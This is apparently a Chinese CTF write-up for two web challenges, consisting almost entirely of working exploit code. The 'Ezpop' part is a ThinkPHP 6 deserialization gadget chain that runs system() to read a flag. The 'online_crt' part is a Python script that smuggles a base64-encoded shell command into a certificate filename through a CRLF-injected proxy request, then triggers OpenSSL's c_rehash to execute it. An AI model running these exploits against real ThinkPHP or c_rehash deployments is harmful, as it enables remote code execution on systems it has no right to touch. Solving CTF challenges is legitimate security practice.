Web
Ezpop
tp6反序列化链子,网上很多
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| <?php
namespace think\model\concern;
trait Attribute{
private $data=['jiang'=>['jiang'=>'cat${IFS}/flag.txt']];
private $withAttr=['jiang'=>['jiang'=>'system']];
protected $json=["jiang"];
protected $jsonAssoc = true;
}
trait ModelEvent{
protected $withEvent;
}
namespace think;
abstract class Model{
use model\concern\Attribute;
use model\concern\ModelEvent;
private $exists;
private $force;
private $lazySave;
protected $suffix;
function __construct($a = '')
{
$this->exists = true;
$this->force = true;
$this->lazySave = true;
$this->withEvent = false;
$this->suffix = $a;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model{}
echo urlencode(serialize(new Pivot(new Pivot())));
?>
|
online_crt
c_rehash文件存在命令注入,用proxy中的重命名将创建的证书文件名变为payload,再用createlink触
发,实现rce
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| import requests
import urllib
import base64
proxy={'http':'http://127.0.0.1:8080'}
url='http://eci-2zegvqjy0fqhy23dpkdo.cloudeci1.ichunqiu.com:8888'
cmd=base64.b64encode('ls'.encode()).decode()
print(cmd)
payload=urllib.parse.quote(f'"||echo {cmd}|base64 -d|sh>mac123||echo".cer')
crt='Country=1&Province=1&City=1&OrganizationalName=1&CommonName=1&EmailAddress=1%40q&submit='
old = requests.post(url + "/getcrt",data=crt,proxies=proxy).text
print(old)
old = requests.post(url + "/getcrt",data=crt,proxies=proxy).text.split('static/crt/')[1]
print(old)
old=urllib.parse.quote(old)
uri1={'uri':
f"/%61%64%6d%69%6e/%72%65%6e%61%6d%65?oldname={old}&newname={payload} HTTP/1.1\r\n"
"Host: admin\r\n"
"User-Agent: Guest\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Language: zh-CN,zh;q=0.9\r\n"
"Connection: close\r\n\r\n"
}
r1=requests.get(url+"/proxy",data=uri1,proxies=proxy).text
print(r1)
link=requests.get(url+"/createlink").text
print(link)
print(requests.get(url+"/static/crt/mac123",proxies=proxy).text)
|
